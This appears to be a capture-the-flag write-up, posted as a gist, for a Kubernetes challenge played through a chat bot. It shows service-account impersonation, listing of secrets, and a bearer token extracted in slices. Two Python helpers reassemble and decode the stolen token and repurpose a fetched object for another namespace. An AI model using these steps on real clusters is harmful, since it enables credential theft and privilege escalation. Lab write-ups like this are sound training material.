@jnaulty
Created June 6, 2020 02:59
Attempt at the March Honk CTF. Honk!

HonkCI Challenge

March 21, 2020

What namespaces exist?

!honkctl get ns

default              Active   84s
garden               Active   61s
home                 Active   61s
kube-node-lease      Active   85s
kube-public          Active   85s
kube-system          Active   85s
local-path-storage   Active   75s
mod                  (output cut off here by the app's ~250-character display limit)

Do any custom resources exist?

!honkctl get crds

NAME     TODO
todo-1   Steal the groundskeepers keys.
todo-2   Get to the Pub.
todo-3   Get into the model-village.
todo-4   Steal the beautiful minature golden bell.
todo-5   ...and take it all the way back home.

Looks like the game is here.

Todo-1

Describing the first todo:

!honkctl describe todo todo-1

The hints are part of the spec:

!honkctl get todo todo-1 -o=jsonpath='{.spec.hint}'

Todo-2

Impersonate the groundskeeper service account (the "keys" from todo-1) and look around the pub namespace:

!honkctl get pods --as system:serviceaccount:garden:groundskeeper -n pub

The pods have service accounts! Empty the pub's pockets (aka, list the service account secrets):

!honkctl get secrets --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath='{range .items[*]}{.metadata.name}{"|"}{end}'

Get the token out of one of those secrets, then run honkctl as that service account: !honkctl --token=<TOKEN> ...

Todo-3

A burly man can be somewhat grizzly. To get the burly-man token, we first get the name of the serviceAccount secret (default-token-dtcrs above). Then we exfiltrate the base64-encoded token value from that secret; concatenating the pieces and base64-decoding gives the bearer token.

The honkctl slack app only shows around 250 characters, and a service account token (a base64-encoded JWT) is about 1200, so the value has to be pulled out in 250-character slices:

!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath={".data.token"} | cut -c1-250
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath={".data.token"} | cut -c251-500
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath={".data.token"} | cut -c501-750
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath={".data.token"} | cut -c751-1000
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath={".data.token"} | cut -c1001-1250
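The five slices have to be glued back together and base64-decoded before the result works as a bearer token, and it is worth checking whose token it is before using it: the JWT's claims name the namespace, the service account and the secret it came from. The Python below is an added example and not part of the gist. It builds a constructed stand-in token (made-up values and an all-zero placeholder signature; the claim names are the ones the legacy service-account token controller issues), slices its base64 form the way the `cut -c` calls do, reassembles it, and reads the unverified claims.

```python
import base64
import json
from typing import Dict, List

CHUNK = 250  # characters the slack front end shows per message (per the gist)


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def make_sample_token() -> str:
    """Constructed stand-in for the JWT inside default-token-dtcrs.

    Values are made up for this example; the signature is a zero-filled
    placeholder, not a real RS256 signature."""
    header = _b64url(json.dumps({"alg": "RS256", "kid": "example"}).encode())
    claims = {
        "iss": "kubernetes/serviceaccount",
        "kubernetes.io/serviceaccount/namespace": "pub",
        "kubernetes.io/serviceaccount/secret.name": "default-token-dtcrs",
        "kubernetes.io/serviceaccount/service-account.name": "default",
        "kubernetes.io/serviceaccount/service-account.uid": "00000000-0000-0000-0000-000000000000",
        "sub": "system:serviceaccount:pub:default",
    }
    payload = _b64url(json.dumps(claims).encode())
    signature = _b64url(b"\x00" * 256)
    return f"{header}.{payload}.{signature}"


def slice_like_cut(b64_token: str, width: int = CHUNK) -> List[str]:
    """Emulate `cut -c1-250`, `cut -c251-500`, ... on the .data.token value."""
    return [b64_token[i:i + width] for i in range(0, len(b64_token), width)]


def reassemble_token(chunks: List[str]) -> str:
    """Join the pasted slices and undo the Secret's base64 layer.

    .data.token holds base64(JWT) and the JWT itself is ASCII, so the result
    is the string that goes into --token. Whitespace the chat client wraps
    around each slice is stripped first. A missing or duplicated slice shows
    up as a length/alphabet error here rather than as a confusing 401 later."""
    b64 = "".join(c.strip() for c in chunks)
    if len(b64) % 4:
        raise ValueError("base64 length not a multiple of 4: a slice is missing or duplicated")
    try:
        return base64.b64decode(b64, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError) as exc:
        raise ValueError(f"reassembled value is not base64(JWT): {exc}") from exc


def jwt_claims(token: str) -> Dict[str, object]:
    """Decode the claims segment without verifying the signature.

    We do not hold the API server's signing key; this only tells us whose
    token we are holding before we spend it."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a three-part JWT; reassembly is probably incomplete")
    payload = parts[1] + "=" * (-len(parts[1]) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def demo() -> Dict[str, object]:
    """Round trip: Secret .data.token -> 250-char slices -> bearer token -> claims."""
    token = make_sample_token()
    data_token = base64.b64encode(token.encode("ascii")).decode("ascii")  # as stored in the Secret
    chunks = slice_like_cut(data_token)
    rebuilt = reassemble_token(chunks)
    claims = jwt_claims(rebuilt)
    return {
        "chunks": len(chunks),
        "roundtrip_ok": rebuilt == token,
        "sub": claims["sub"],
        "claims": claims,
    }


if __name__ == "__main__":
    result = demo()
    print(f"{result['chunks']} slices -> token for {result['sub']}")
```

With a real token, call reassemble_token() on the five strings pasted out of the chat and jwt_claims() on the result; the sub claim should read system:serviceaccount:pub:<name> before you put the token behind --token.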

Taking a look around with that token, there's only a configmap named bell in the model-village namespace, which is exactly what we were looking for:

!honkctl --token $TOKEN get cm bell -n model-village -o json

Todo-4

The configmap's bell.yaml key holds a Pod manifest:

!honkctl --token $TOKEN get cm bell -n model-village -o jsonpath={".data.bell\\.yaml"}
apiVersion: v1
kind: Pod
metadata:
  name: bell
  namespace: home
  annotations:
    description: "A beautiful golden bell."
  labels:
    beautiful: 'true'
spec:
  containers:
  - name: bell
    image: mrbobbytables/bell:latest
    ports:
    - containerPort: 80

The challenge seems to be to get this container to run in the home namespace.

I've tried to

  • copy the configmap to any namespace
!honkctl --token $TOKEN get  cm bell -n model-village -o yaml | kubectl --token $TOKEN -n home apply -f -
  • apply the pod spec to the home namespace
!honkctl --token $TOKEN get cm --export bell -n model-village -o jsonpath={".data.bell\\.yaml"} | kubectl --token $TOKEN apply -f -
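Two things stand in the way of the first attempt above: kubectl apply with an explicit -n refuses an object whose metadata.namespace names a different namespace, and the API server rejects a create that still carries the fetched object's resourceVersion. The --export flag used in the second attempt was what stripped those server-owned fields (it was removed in kubectl 1.18). The Python below is an added example, not from the gist: using a constructed ConfigMap as stand-in input (made-up uid, resourceVersion and timestamp), it models kubectl's namespace check and scrubs a fetched object so it can be applied in home.

```python
import copy
import json
from typing import Any, Dict

# Constructed stand-in for `honkctl get cm bell -n model-village -o json`,
# trimmed to the fields that matter here. uid/resourceVersion/timestamp are made up.
FETCHED_CONFIGMAP: Dict[str, Any] = {
    "apiVersion": "v1",
    "kind": "ConfigMap",
    "metadata": {
        "name": "bell",
        "namespace": "model-village",
        "uid": "6f1a2c3e-0000-4000-8000-000000000000",
        "resourceVersion": "1234",
        "creationTimestamp": "2020-03-21T00:00:00Z",
        "selfLink": "/api/v1/namespaces/model-village/configmaps/bell",
    },
    "data": {
        "bell.yaml": "apiVersion: v1\nkind: Pod\nmetadata:\n  name: bell\n  namespace: home\n",
    },
}

# Metadata the API server owns. A create that carries resourceVersion is refused
# ("resourceVersion should not be set on objects to be created"); uid,
# creationTimestamp and selfLink are overwritten; managedFields is server bookkeeping.
SERVER_OWNED = ("uid", "resourceVersion", "creationTimestamp", "selfLink",
                "managedFields", "generation")


def namespace_of(obj: Dict[str, Any]) -> str:
    return obj.get("metadata", {}).get("namespace", "")


def check_apply_namespace(obj: Dict[str, Any], cli_namespace: str) -> bool:
    """Model the check kubectl apply performs when -n is passed explicitly:
    an object whose metadata.namespace disagrees with the flag is refused."""
    ns = namespace_of(obj)
    if ns and ns != cli_namespace:
        raise ValueError(
            f'the namespace from the provided object "{ns}" does not match '
            f'the namespace "{cli_namespace}"'
        )
    return True


def prepare_for_namespace(obj: Dict[str, Any], target_namespace: str) -> Dict[str, Any]:
    """Return a copy of a fetched object that can be applied in another namespace.

    Drops status and server-owned metadata (what --export used to do) and
    rewrites the namespace; the input dict is left untouched."""
    out = copy.deepcopy(obj)
    out.pop("status", None)
    meta = out.setdefault("metadata", {})
    for key in SERVER_OWNED:
        meta.pop(key, None)
    meta["namespace"] = target_namespace
    return out


def to_manifest(obj: Dict[str, Any]) -> str:
    """JSON is valid input to `kubectl apply -f -`, so no YAML library is needed."""
    return json.dumps(obj, indent=2)


if __name__ == "__main__":
    try:
        check_apply_namespace(FETCHED_CONFIGMAP, "home")
    except ValueError as exc:
        print("as fetched:", exc)
    clean = prepare_for_namespace(FETCHED_CONFIGMAP, "home")
    check_apply_namespace(clean, "home")
    print(to_manifest(clean))  # pipe this into: kubectl --token $TOKEN apply -n home -f -
```

The embedded bell.yaml already says namespace: home, so the second attempt above has the right shape; what remains is whether the token is allowed to create pods there, which `kubectl auth can-i create pods -n home --token $TOKEN` answers directly.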

Todo-5

I don't really know how to create anything in that namespace.
